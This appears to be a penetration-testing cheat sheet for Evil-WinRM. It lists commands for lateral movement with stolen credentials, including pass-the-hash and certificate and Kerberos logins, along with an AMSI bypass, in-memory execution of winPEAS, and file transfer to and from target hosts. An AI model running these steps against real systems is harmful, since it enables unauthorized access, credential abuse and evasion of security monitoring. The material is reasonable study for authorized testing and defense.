Evil-WinRM

Link: https://github.com/Hackplayers/evil-winrm

Port: 5985 (Over HTTP) 5986 (Over HTTPS)

TIP: Use -S flag to enable SSL. Use this when the WinRM port is 5986 (Over HTTPS)

Do lateral movement via WinRM protocol using found credentials with evil-winrm

In your Evil-WinRM session, when authenticating you can use a folder from your local machine as a source to run powershell scripts

evil-winrm -i TARGET_IP -u USER -p PASSWORD -s /path/to/PowerSharpBinaries

Bypass AMSI using the command within the session:

Bypass-4MSI

Then you can run scripts from memory (DO NOT WRITE ON DISK UNLESS ABSOLUTELY NECESSARY!)

Authentication Methods

1) Clear text Password

 evil-winrm -i TARGET_IP -u USERNAME -p PASSWORD

2) Certificate (.pfx file)

 openssl pkcs12 -in USER_PFX_CERT.pfx -nocerts -out key.pem -nodes

   openssl pkcs12 -in USER_PFX_CERT.pfx -nokeys -out cert.pem

After generating the private key from the .pfx file, we use Evil-WinRM to authenticate

evil-winrm -i TARGET_IP -c CERT.pem -k KEY.pem -S

3) Kerberos

kinit USERNAME@DOMAIN.LOCAL (Authenticate and retrieve a ticket on Windows)

impacket-getTGT DOMAIN.LOCAL/USERNAME:PASSWORD (Request a TGT ticket on Linux)

Configure /etc/krb5.conf file with the appropriate settings (Replace some of the placeholders for your use case)

   [libdefaults]
    default_realm = DOMAIN.LOCAL
    ticket_lifetime = 24h
    renew_lifetime = 7d
    forwardable = true
    dns_lookup_realm = false
    dns_lookup_kdc = true

   [realms]
   DOMAIN.local = {
    kdc = IP or Hostname of KDC/Domain Controller
    admin_server = IP or Hostname of Admin Server
   }

   [domain_realm]
    .domain.local = DOMAIN.LOCAL
    domain.local = DOMAIN.LOCAL

evil-winrm -r DOMAIN.LOCAL -i DC.DOMAIN.LOCAL (Authenticate via kerberos)

4) NTLM Authentication (Pass-the-Hash)

evil-winrm -i TARGET_IP -u USER -H NTLM_HASH

5) Authenticate using IPv6 address (In case firewall blocks IPv4 traffic on port 5985)

evil-winrm -i [IPv6] -u USER -p PASSWORD

TIP: Enter the IPv6 in your /etc/hosts file and give it a hostname (preferably the target machine name)

6) Store logs with Evil-WinRM

evil-winrm -i IP -u administrator -p Password@987 -l

Logs will be saved to

/home/user/evil-winrm-logs
or
/root/evil-winrm-logs

7) Run executables in Evil-WinRM sessions

evil-winrm -i IP -u administrator -p Password@987 -e /opt/privsc
Bypass-4MSI
menu
Invoke-Binary /opt/privsc/winPEASx64.exe

8) Service Enumeration

menu
services

9) File Transfer

Upload a file from our system to target machine

upload /home/user/test.txt .

Download a file from target machine to our system

download test.txt /home/user/test.txt

10) Use Evil-WinRM from Docker

docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i IP -u Administrator -p 'Password@987'

PreviousEnumeration NextHTTP Tunneling

Last updated 5 months ago

hashtagLink: https://github.com/Hackplayers/evil-winrm

hashtagPort: 5985 (Over HTTP) 5986 (Over HTTPS)

hashtagTIP: Use -S flag to enable SSL. Use this when the WinRM port is 5986 (Over HTTPS)

hashtagDo lateral movement via WinRM protocol using found credentials with evil-winrm

hashtagIn your Evil-WinRM session, when authenticating you can use a folder from your local machine as a source to run powershell scripts

hashtagBypass AMSI using the command within the session:

hashtagThen you can run scripts from memory (DO NOT WRITE ON DISK UNLESS ABSOLUTELY NECESSARY!)

hashtagAuthentication Methods

hashtag1) Clear text Password

hashtag2) Certificate (.pfx file)

hashtagAfter generating the private key from the .pfx file, we use Evil-WinRM to authenticate

hashtag3) Kerberos

hashtag

hashtag4) NTLM Authentication (Pass-the-Hash)

hashtag5) Authenticate using IPv6 address (In case firewall blocks IPv4 traffic on port 5985)

hashtagTIP: Enter the IPv6 in your /etc/hosts file and give it a hostname (preferably the target machine name)

hashtag6) Store logs with Evil-WinRM

hashtag7) Run executables in Evil-WinRM sessions

hashtag8) Service Enumeration

hashtag9) File Transfer

hashtag10) Use Evil-WinRM from Docker